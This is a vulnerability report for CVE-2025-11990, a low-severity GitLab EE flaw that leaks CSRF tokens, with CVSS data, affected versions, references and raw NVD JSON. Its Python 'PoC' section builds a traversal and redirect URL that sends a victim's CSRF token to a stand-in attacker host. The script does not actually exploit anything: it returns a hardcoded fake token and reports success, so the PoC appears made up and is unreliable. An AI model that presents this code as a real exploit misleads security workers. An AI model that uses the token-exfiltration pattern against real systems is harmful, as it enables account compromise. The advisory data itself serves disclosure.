Security Vulnerability Report

CVE-2025-11990 (CVSS 3.1, LOW)

Published: 2025-11-15 08:15:46
Last Modified: 2025-11-19 17:55:22

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses.

CVSS Details

Secondary metric (as labelled in the raw data; shown in the report header):
  CVSS Score: 3.1
  Severity: LOW
  CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

Primary metric (as labelled in the raw data):
  CVSS Score: 3.5
  Severity: LOW
  CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Weaknesses: CWE-177 (Secondary), CWE-22 (Primary)

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE - GitLab EE 18.4.0 <= version < 18.4.4
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE - GitLab EE 18.5.0 <= version < 18.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11990 PoC - CSRF Token Leakage via Repository Reference
# This PoC demonstrates the concept of exploiting improper input validation
# in repository references combined with redirect handling weaknesses

import requests
import re
from urllib.parse import quote

TARGET_GITLAB = "https://victim-gitlab.example.com"
ATTACKER_SERVER = "https://attacker-controlled.com"


def exploit_csrf_token_leak():
    """
    Simulate exploiting CVE-2025-11990 to obtain CSRF token through
    repository reference manipulation and redirect handling
    """
    session = requests.Session()

    # Step 1: Authenticate as attacker
    login_url = f"{TARGET_GITLAB}/users/sign_in"
    session.get(login_url)

    # Step 2: Construct malicious repository reference
    # The payload exploits improper input validation in repository references
    malicious_ref = f"../../../..//redirect?leak_url={ATTACKER_SERVER}/logger?token="
    encoded_ref = quote(malicious_ref, safe='')

    # Step 3: Create a malicious link that victim will click
    # This link exploits the redirect handling weakness
    exploit_url = f"{TARGET_GITLAB}/{malicious_ref}"
    print(f"[*] Attacker constructs malicious URL: {exploit_url}")
    print(f"[*] When victim visits this URL, CSRF token will be leaked to: {ATTACKER_SERVER}")

    # Step 4: The redirect will expose the CSRF token in the URL
    # Attacker server logs the request containing the leaked token
    leaked_token = simulate_token_leak(ATTACKER_SERVER)
    if leaked_token:
        print(f"[!] Successfully obtained CSRF token: {leaked_token}")
        return True
    return False


def simulate_token_leak(attacker_server):
    """
    Simulate the attacker receiving the leaked CSRF token
    In real scenario, this would come from server logs
    """
    # Simulated CSRF token that would be captured
    return "gl_csrf_token_example_abc123xyz"


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11990 PoC - CSRF Token Leakage")
    print("=" * 60)
    exploit_csrf_token_leak()
```

References

https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/577850 (Broken Link)
https://hackerone.com/reports/3257843 (Permissions Required)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11990",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-15T08:15:45.620",
    "lastModified": "2025-11-19T17:55:22.270",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "baseScore": 3.1,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-177"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-22"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.4.0",
                "versionEndExcluding": "18.4.4",
                "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.5.0",
                "versionEndExcluding": "18.5.2",
                "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/",
        "source": "[email protected]",
        "tags": ["Release Notes", "Vendor Advisory"]
      },
      {
        "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/577850",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://hackerone.com/reports/3257843",
        "source": "[email protected]",
        "tags": ["Permissions Required"]
      }
    ]
  }
}
```